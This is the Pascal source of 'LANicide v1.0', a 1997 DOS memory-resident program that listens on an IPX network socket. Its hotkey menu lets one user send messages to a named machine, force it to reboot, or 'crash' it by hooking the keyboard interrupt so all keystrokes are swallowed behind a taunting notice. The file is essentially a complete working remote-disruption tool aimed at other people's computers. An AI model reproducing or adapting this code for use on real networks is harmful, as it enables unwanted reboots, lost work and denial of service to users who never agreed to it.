program LANicide;

{$F+}
{$S-}
{$V-}
{$M 4096, 0, 0}

uses
   dos,
   ipx;

type
   screen = array[0..4000] of byte;
   ttype = string[8];
   msg = string[79];
   msgtype = record
      person:ttype;
      code:byte;
      message:msg;
   end;
   packet = record
      ecb:ecbtype;
      IPX:ipxheader;
      data:msgtype;
   end;

{$I a:\id.pas}

var
   screensave:screen;
   ID:string[8];
   receive, send:packet;
   timerint, keybdint:procedure;
   temp:pointer;
   tick, typing:byte;
   protected, TSRActive, Crashed, AltKey:boolean;

procedure setintvec(vec:byte; ptr:pointer);
begin
   meml[0:vec*4]:= longint(ptr);
end;

procedure getintvec(vec:byte; var ptr:pointer);
begin
   longint(ptr):= meml[0:vec*4];
end;

Procedure Delay(ms : Word); Assembler;
Asm {machine independent Delay Function}
  mov ax, 1000;
  mul ms;
  mov cx, dx;
  mov dx, ax;
  mov ah, $86;
  int $15;
end;

function readkey:byte;
var
   b:byte;
begin
   asm
      xor ah, ah;
      int 16h;
      mov b, al;
   end;
   readkey:= b;
end;

function getscancode:byte;
var
   b:byte;
begin
   asm
      xor ah, ah;
      int 16h;
      mov b, ah;
   end;
   getscancode:= b;
end;

function caps(s:string):string;
var
   i, l :byte;
begin
   l:= length(s);
   for i:= 1 to l do
      if ord(s[i]) in [97..122] then
         s[i]:= chr(ord(s[i]) - 32);
   caps:= s;
end;

procedure write(s:string; color, x, y:byte);
 var
   counter1,
   counter2: word;
   l:byte;
 begin
    counter1 := 2 * ((x-1) + (y-1) * 80);
    l:= ord(s[0]);
    for counter2 := 1 to l do
     begin
      mem [$b800: counter1] := ord(s[counter2]);
      inc (counter1);
      mem [$b800: counter1] := color;
      inc (counter1);
     end;
end;

procedure save_screen;
var
   video:array[1..2000] of word absolute $b800:$0000;
begin
   move(video, screensave, 4000);
end;

procedure restore_screen;
var
   video:array[1..2000] of word absolute $b800:$0000;
begin
   move(screensave, video, 4000);
end;

procedure display(title:ttype; message:msg);
begin
   write('Ŀ', $70, 1, 10);
   write('                                                                            ', $70, 1, 11);
   write('                                                                            ', $70, 1, 12);
   write('                                                                            ', $70, 1, 13);
   write('', $70, 1, 14);
   write(' '+title+' ', $70, 40 - (length(title)+2) div 2, 10);
   write(message, $70, 40 - length(message) div 2, 12);
   repeat until readkey = 13;
end;

procedure get(title:ttype; var message:msg);
var
   x:byte;
   b:byte;
begin
   write('Ŀ', $70, 1, 10);
   write('                                                                            ', $70, 1, 11);
   write('                                                                            ', $70, 1, 12);
   write('                                                                            ', $70, 1, 13);
   write('', $70, 1, 14);
   write(' '+title+' ', $70, 40 - (length(title)+2) div 2, 10);
   x:= 5;
   message:= '';
   b:= readkey;
   while b <> 13 do
      begin
         if b <> 8 then
            begin
               write(chr(b), $70, x, 12);
               message:= message + chr(b);
               inc(x);
            end
         else
            begin
               dec(x);
               write(' ', $70, x, 12);
               delete(message, x-4, 1);
            end;
         b:= readkey;
      end;
end;

function menu:byte;
var
   ch, p:byte;
begin
   write(' LANicide v1.0 Ŀ', $70, 22, 7);
   write('                                   ', $70, 22, 8);
   write('  Choose:                          ', $70, 22, 9);
   write('        Send Message               ', $70, 22, 10);
   write('        Reboot Target              ', $70, 22, 11);
   write('        Crash Target               ', $70, 22, 12);
   write('        UnCrash Target             ', $70, 22, 13);
   if not protected then
      write('        Protection                 ', $70, 22, 14)
   else
      write('        Unprotect                  ', $70, 22, 14);
   write('        Exit                       ', $70, 22, 15);
   write('                                   ', $70, 22, 16);
   write('ٱ', $70, 22, 17);
   write('', $70, 23, 18);
   p:= 1;
   write('==> ', $70, 25, 10);
   repeat
   ch:= getscancode;
   if ch = 80 then
      begin
          write('    ', $70, 25, p+9);
          p:= p + 1;
          if p = 7 then p:= 1;
          write('==> ', $70, 25, p+9);
      end;
   if ch = 72 then
      begin
         write('    ', $70, 25, p+9);
         p:= p - 1;
         if p = 0 then p:= 6;
         write('==> ', $70, 25, p+9);
      end;
   until ch = 28;
   menu:= p;
end;

procedure handle_send(m:byte);
begin
   case m of
      1 : begin
             get('Message?', send.data.message);
             get('To Whom?', send.data.person);
             send.data.code:= 1;
             ipxsendpacket(send.ecb);
          end;
      2 : begin
             send.data.code:= 2;
             get('To Whom?', send.data.person);
             ipxsendpacket(send.ecb);
          end;
      3 : begin
             send.data.code:= 3;
             get('To Whom?', send.data.person);
             ipxsendpacket(send.ecb);
          end;
      4 : begin
             send.data.code:= 4;
             get('To Whom?', send.data.person);
             ipxsendpacket(send.ecb);
          end;
      5 : protected:= not protected;
   end;
   send.data.code:= 0;
end;

procedure crasher; interrupt;
begin
   {write(chr(typing+48), $70, 1, 1);}
   if (typing = 14) and not TSRActive then
      begin
         TSRActive:= true;
         save_screen;
         typing:= 0;
         write('Ŀ', $70, 1, 10);
         write('                                                                            ', $70, 1, 11);
         write('                                                                            ', $70, 1, 12);
         write('                                                                            ', $70, 1, 13);
         write('', $70, 1, 14);
         write(' Notice ', $70, 40 - 8 div 2, 10);
         write('LANicide has halted keyboard interface.  You''re crashed goober!', $70, 40 - 63 div 2, 12);
         delay(2000);
         restore_screen;
         TSRActive:= false;
     end;
   typing:= typing + 1;
   asm
      mov al, 0;
      out 60h, al;
      in al, 061h
      mov bl, al
      or al, 080h
      out 061h, al
      mov al, bl
      out 061h, al
      mov al, 20h;
      out 20h, al;
   end;
end;

procedure handle_listen;
begin
   save_screen;
   case receive.data.code of
      1 : display('Message', receive.data.message);
      2 : if not protected then
             inline($EA/00/00/$FF/$FF);
      3 : if not protected then
             begin
                getintvec(9, temp);
                typing:= 0;
                setintvec(9, addr(crasher));
                Crashed:= true;
             end;
      4 : if Crashed then
          begin
             setintvec(9, temp);
             display('Notice', 'UnCrashed.');
             crashed:= false;
          end;
      5 : begin Crashed:= true; getintvec(9, temp);
          setintvec(9, addr(crasher)); end;
   end;
   if IPXListenForPacket(receive.ecb) = 0 then ;
   restore_screen;
end;

procedure key; interrupt;
begin
   asm pushf; end;
   keybdint;
   if port[$60] = 56 then altkey:= true;
   if port[$60] = 184 then altkey:= false;
   if (port[$60] = 87) and altkey and not TSRActive then
      begin
         TSRActive:= true;
         save_screen;
         handle_send(menu);
         restore_screen;
         TSRActive:= false;
      end;
end;

procedure timer; interrupt;
begin
   asm pushf end;
   timerint;
   port[$20]:= $20;
   if not TSRActive then
      begin
         if tick = 3 then
            begin
               tick:= 0;
               TSRActive:= true;
               if receive.ecb.inuse = 0 then
                  if (caps(receive.data.person) = ID) then
                     handle_listen
                  else
                     if IPXListenForPacket(receive.ecb) = 0 then ;
               TSRActive:= false;
            end
         else
            inc(tick);
      end;
end;

var
   socket:word;

begin
   writeln('LANicide v1.0.  Copyright 1997 Jack Neely.   All Rights Reserved.');
   socket:= $5390;
   tick:= 0;
   typing:= 0;
   TSRActive:= false;
   protected:= false;
   Crashed:= false;
   if not IPXinstalled then
      begin
         writeln('IPX substructure not detected.');
         halt(1);
      end;
   ID:= getID;
   writeln('You have been detected as ', ID, '.');
   initsendpacket(send.ecb, send.ipx, sizeof(MsgType), socket);
   initreceivepacket(receive.ecb, receive.ipx, sizeof(MsgType), socket);
   if IPXOpenSocket($FF, socket) <> 0 then
      begin
         writeln('Failure on opening IPX socket.');
         halt(1);
      end;
   if IPXListenForPacket(receive.ecb) <> 0 then
      begin
         writeln('Error on listening to IPX network.');
         halt(1);
      end;
   getintvec(9, @keybdint);
   setintvec(9, addr(key));
   getintvec(9, temp);
   getintvec($1c, @timerint);
   setintvec($1c, addr(timer));
   writeln('LANicide is successfully installed!');
   keep(0);
end.